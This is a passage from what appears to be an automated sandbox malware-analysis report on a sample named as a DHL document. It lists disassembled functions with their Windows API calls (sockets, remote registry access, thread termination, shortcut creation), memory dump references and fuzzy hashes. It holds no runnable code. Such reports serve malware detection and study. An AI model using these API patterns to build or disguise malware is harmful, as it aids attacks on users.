                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleLoadModuleString$Message
                                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                                            • API String ID: 4072794657-3128320259
                                                                                            • Opcode ID: f10742a4176b448957fd040c09727578ddc549ccdf18b4f1c30a5b570b368c2e
                                                                                            • Instruction ID: 9c8aaf8a9f7c61de01b4df8fd56186fc2d1482be967c216aca263f407c3c2b4d
                                                                                            • Opcode Fuzzy Hash: f10742a4176b448957fd040c09727578ddc549ccdf18b4f1c30a5b570b368c2e
                                                                                            • Instruction Fuzzy Hash: B2016DF29002187FE711ABE49D89EEB376CFB08305F400596B746E2081EA749E848F74
                                                                                            Function 0089096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • InterlockedExchange.KERNEL32(00B309D0,00B309D0), ref: 0089097B
                                                                                            • EnterCriticalSection.KERNEL32(00B309B0,00000000), ref: 0089098D
                                                                                            • TerminateThread.KERNEL32(00000000,000001F6), ref: 0089099B
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 008909A9
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008909B8
                                                                                            • InterlockedExchange.KERNEL32(00B309D0,000001F6), ref: 008909C8
                                                                                            • LeaveCriticalSection.KERNEL32(00B309B0), ref: 008909CF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                            • String ID:
                                                                                            • API String ID: 3495660284-0
                                                                                            • Opcode ID: f2e7bcd1f56bc3becf0efaca2fb627b24ae6bc6f8c42f2ca9c6ef4d34404bbe1
                                                                                            • Instruction ID: 1c94ef795818474013df098cb305bdd8854658ddf97e3fb21030300c42ec5d87
                                                                                            • Opcode Fuzzy Hash: f2e7bcd1f56bc3becf0efaca2fb627b24ae6bc6f8c42f2ca9c6ef4d34404bbe1
                                                                                            • Instruction Fuzzy Hash: 0CF0EC32442A12BFDB555FA4EE8DBD6BB39FF05702F442226F202908A1C7759865CF90
                                                                                            Function 008A1C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 008A1DC0
                                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 008A1DE1
                                                                                            • WSAGetLastError.WSOCK32 ref: 008A1DF2
                                                                                            • htons.WSOCK32(?,?,?,?,?), ref: 008A1EDB
                                                                                            • inet_ntoa.WSOCK32(?), ref: 008A1E8C
                                                                                              • Part of subcall function 008839E8: _strlen.LIBCMT ref: 008839F2
                                                                                              • Part of subcall function 008A3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0089EC0C), ref: 008A3240
                                                                                            • _strlen.LIBCMT ref: 008A1F35
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                            • String ID:
                                                                                            • API String ID: 3203458085-0
                                                                                            • Opcode ID: 0bd415307cc0e4d2ea9fed00bad9a0a3326fbd1ca3d06d7643b071a0994233bf
                                                                                            • Instruction ID: 342439b03635bab067f64646bf7fa6ce8016b732e4f24e3574b4a8d441e92705
                                                                                            • Opcode Fuzzy Hash: 0bd415307cc0e4d2ea9fed00bad9a0a3326fbd1ca3d06d7643b071a0994233bf
                                                                                            • Instruction Fuzzy Hash: 83B1EF30204340AFE724DF28C889E2A7BA5FF85318F54855CF4569F6A2DB71ED81CB92
                                                                                            Function 00825D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetClientRect.USER32(?,?), ref: 00825D30
                                                                                            • GetWindowRect.USER32(?,?), ref: 00825D71
                                                                                            • ScreenToClient.USER32(?,?), ref: 00825D99
                                                                                            • GetClientRect.USER32(?,?), ref: 00825ED7
                                                                                            • GetWindowRect.USER32(?,?), ref: 00825EF8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Rect$Client$Window$Screen
                                                                                            • String ID:
                                                                                            • API String ID: 1296646539-0
                                                                                            • Opcode ID: 7aa54d5cb6debe4e36a82d3214b51049304c03b258240e03d3ef63eb77b27b60
                                                                                            • Instruction ID: b371651fed4ab9e4d4ab25ed3d540a04a744f588d6d0095deb06d4758d151c11
                                                                                            • Opcode Fuzzy Hash: 7aa54d5cb6debe4e36a82d3214b51049304c03b258240e03d3ef63eb77b27b60
                                                                                            • Instruction Fuzzy Hash: 07B17938A0074ADBDB14CFA8C4807EEB7F1FF58310F15951AE8A9D7250DB30AA91DB50
                                                                                            Function 008501B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __allrem.LIBCMT ref: 008500BA
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008500D6
                                                                                            • __allrem.LIBCMT ref: 008500ED
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0085010B
                                                                                            • __allrem.LIBCMT ref: 00850122
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00850140
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                            • String ID:
                                                                                            • API String ID: 1992179935-0
                                                                                            • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                            • Instruction ID: 87be0afb0d0f8ddc878732bd9dff421bd0098ad9fe155c1300ee7926b07593b3
                                                                                            • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                            • Instruction Fuzzy Hash: C681E772A00B0A9BE7209F6CCC41B6A73E9FF51365F24413EF951D6682EF70D9088B52
                                                                                            Function 008561FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,008482D9,008482D9,?,?,?,0085644F,00000001,00000001,8BE85006), ref: 00856258
                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0085644F,00000001,00000001,8BE85006,?,?,?), ref: 008562DE
                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008563D8
                                                                                            • __freea.LIBCMT ref: 008563E5
                                                                                              • Part of subcall function 00853820: RtlAllocateHeap.NTDLL(00000000,?,008F1444,?,0083FDF5,?,?,0082A976,00000010,008F1440,008213FC,?,008213C6,?,00821129), ref: 00853852
                                                                                            • __freea.LIBCMT ref: 008563EE
                                                                                            • __freea.LIBCMT ref: 00856413
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1414292761-0
                                                                                            • Opcode ID: b218fbf1546f4de9f413552c7e4dc9299adef6904fe52c4e365575f7b447b8d3
                                                                                            • Instruction ID: 32f1586825b6b3b1fcfa8a6f94809f0ad4f1ddc67f8066294743e4138ec22902
                                                                                            • Opcode Fuzzy Hash: b218fbf1546f4de9f413552c7e4dc9299adef6904fe52c4e365575f7b447b8d3
                                                                                            • Instruction Fuzzy Hash: 9751C072A00216ABEF258F68CC81EEF7BA9FB44752F554629FC05D7240EB34DC68C661
                                                                                            Function 008ABBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                              • Part of subcall function 008AC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008AB6AE,?,?), ref: 008AC9B5
                                                                                              • Part of subcall function 008AC998: _wcslen.LIBCMT ref: 008AC9F1
                                                                                              • Part of subcall function 008AC998: _wcslen.LIBCMT ref: 008ACA68
                                                                                              • Part of subcall function 008AC998: _wcslen.LIBCMT ref: 008ACA9E
                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008ABCCA
                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008ABD25
                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 008ABD6A
                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 008ABD99
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 008ABDF3
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 008ABDFF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                            • String ID:
                                                                                            • API String ID: 1120388591-0
                                                                                            • Opcode ID: bc1c030f79eafe24cfa1df5e8df3015df7e66711bda588c38f481dc6a53b0ece
                                                                                            • Instruction ID: 1aaec271e32be6c9dcd13963c9c1a12f02b310dffa920434c40751e61e19ec75
                                                                                            • Opcode Fuzzy Hash: bc1c030f79eafe24cfa1df5e8df3015df7e66711bda588c38f481dc6a53b0ece
                                                                                            • Instruction Fuzzy Hash: 6F818F71208241EFD714DF24C895E2ABBE5FF85308F14896CF5998B2A2DB31ED45CB92
                                                                                            Function 0087F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VariantInit.OLEAUT32(00000035), ref: 0087F7B9
                                                                                            • SysAllocString.OLEAUT32(00000001), ref: 0087F860
                                                                                            • VariantCopy.OLEAUT32(0087FA64,00000000), ref: 0087F889
                                                                                            • VariantClear.OLEAUT32(0087FA64), ref: 0087F8AD
                                                                                            • VariantCopy.OLEAUT32(0087FA64,00000000), ref: 0087F8B1
                                                                                            • VariantClear.OLEAUT32(?), ref: 0087F8BB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                                                            • String ID:
                                                                                            • API String ID: 3859894641-0
                                                                                            • Opcode ID: 936c5520202094cd625d6ec8b655ef1e2fbaf61e237a18587afe95252394036c
                                                                                            • Instruction ID: d6776a27d986a6ae55aee5d81f96d5bd2195b19f5fa726393ce5f06e53024d99
                                                                                            • Opcode Fuzzy Hash: 936c5520202094cd625d6ec8b655ef1e2fbaf61e237a18587afe95252394036c
                                                                                            • Instruction Fuzzy Hash: 2751B531500314AACF10AB6AD895769B7A4FF45314F24D466EB09EF29BDB70CC40D7A7
                                                                                            Function 0089910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00827620: _wcslen.LIBCMT ref: 00827625
                                                                                              • Part of subcall function 00826B57: _wcslen.LIBCMT ref: 00826B6A
                                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 008994E5
                                                                                            • _wcslen.LIBCMT ref: 00899506
                                                                                            • _wcslen.LIBCMT ref: 0089952D
                                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00899585
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$FileName$OpenSave
                                                                                            • String ID: X
                                                                                            • API String ID: 83654149-3081909835
                                                                                            • Opcode ID: fcdee2a8a28f0778d90a809f542e058ff63bb66eea06c711daa37a9693a0d6c7
                                                                                            • Instruction ID: 5eb0a435737c0040e67540e28008be2efa0c2a3e596940e21937f7167eed8c2c
                                                                                            • Opcode Fuzzy Hash: fcdee2a8a28f0778d90a809f542e058ff63bb66eea06c711daa37a9693a0d6c7
                                                                                            • Instruction Fuzzy Hash: BFE18F315043509FDB14EF28D881A6AB7E4FF84314F09896DE899DB3A2DB31DD45CB92
                                                                                            Function 0083920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00839BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00839BB2
                                                                                            • BeginPaint.USER32(?,?,?), ref: 00839241
                                                                                            • GetWindowRect.USER32(?,?), ref: 008392A5
                                                                                            • ScreenToClient.USER32(?,?), ref: 008392C2
                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008392D3
                                                                                            • EndPaint.USER32(?,?,?,?,?), ref: 00839321
                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 008771EA
                                                                                              • Part of subcall function 00839339: BeginPath.GDI32(00000000), ref: 00839357
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                            • String ID:
                                                                                            • API String ID: 3050599898-0
                                                                                            • Opcode ID: 6142b6fd07dc453860f84b8ef97ccadaa445d1159eead32ed1a931d530a918ef
                                                                                            • Instruction ID: 5110df22e336143018812b61c8e1d7714a61a88d6fe01e6c47ff1812b6c8766c
                                                                                            • Opcode Fuzzy Hash: 6142b6fd07dc453860f84b8ef97ccadaa445d1159eead32ed1a931d530a918ef
                                                                                            • Instruction Fuzzy Hash: FC419270104201EFDB11DF28CC88FBA7BA8FB95324F140669F9A5D72A1D7B19845DBA2
                                                                                            Function 008907EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0089080C
                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00890847
                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 00890863
                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 008908DC
                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 008908F3
                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00890921
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                            • String ID:
                                                                                            • API String ID: 3368777196-0
                                                                                            • Opcode ID: ee8b595b1144d120816948038c9a747c4407186673bcda2050ed678049f5e848
                                                                                            • Instruction ID: 805a2037bcd5bb033e1bd96a2e88b968ae1a533dcba19da33ae9214653f3fd2e
                                                                                            • Opcode Fuzzy Hash: ee8b595b1144d120816948038c9a747c4407186673bcda2050ed678049f5e848
                                                                                            • Instruction Fuzzy Hash: 0D415671A00205AFDF14AF58DC85AAA77B9FF44300F1440A9E900EE297DB30DE60DBA1
                                                                                            Function 008B81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0087F3AB,00000000,?,?,00000000,?,0087682C,00000004,00000000,00000000), ref: 008B824C
                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 008B8272
                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 008B82D1
                                                                                            • ShowWindow.USER32(00000000,00000004), ref: 008B82E5
                                                                                            • EnableWindow.USER32(00000000,00000001), ref: 008B830B
                                                                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 008B832F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 642888154-0
                                                                                            • Opcode ID: e8dd5f250e56aab4bbcc1716209f944f4c97dacad1d9b0f0dd79e3853a95ff05
                                                                                            • Instruction ID: c1a94ba256244619a12a19b7c4ce78b5fd75f37adb70cd9dc5cd60136c35c0c8
                                                                                            • Opcode Fuzzy Hash: e8dd5f250e56aab4bbcc1716209f944f4c97dacad1d9b0f0dd79e3853a95ff05
                                                                                            • Instruction Fuzzy Hash: AB416034601644EFDF26CF25C899FE57FE5FB1A714F1842A9E5088B3A2CB71A841CB90
                                                                                            Function 00884C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • IsWindowVisible.USER32(?), ref: 00884C95
                                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00884CB2
                                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00884CEA
                                                                                            • _wcslen.LIBCMT ref: 00884D08
                                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00884D10
                                                                                            • _wcsstr.LIBVCRUNTIME ref: 00884D1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                            • String ID:
                                                                                            • API String ID: 72514467-0
                                                                                            • Opcode ID: 02bf5dccbade71216b2483db42caac08c1526e096edbf05f065508685a8694b0
                                                                                            • Instruction ID: 755797299c70b6fce12da170c13d2cfa1cf7e257faa8c6287abc339d082224b1
                                                                                            • Opcode Fuzzy Hash: 02bf5dccbade71216b2483db42caac08c1526e096edbf05f065508685a8694b0
                                                                                            • Instruction Fuzzy Hash: 60212633604206BBEB656B39EC09E7B7B9CFF45754F10902EF805CA192EA61DC0093A1
                                                                                            Function 0089581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00823AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00823A97,?,?,00822E7F,?,?,?,00000000), ref: 00823AC2
                                                                                            • _wcslen.LIBCMT ref: 0089587B
                                                                                            • CoInitialize.OLE32(00000000), ref: 00895995
                                                                                            • CoCreateInstance.OLE32(008BFCF8,00000000,00000001,008BFB68,?), ref: 008959AE
                                                                                            • CoUninitialize.OLE32 ref: 008959CC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                            • String ID: .lnk
                                                                                            • API String ID: 3172280962-24824748
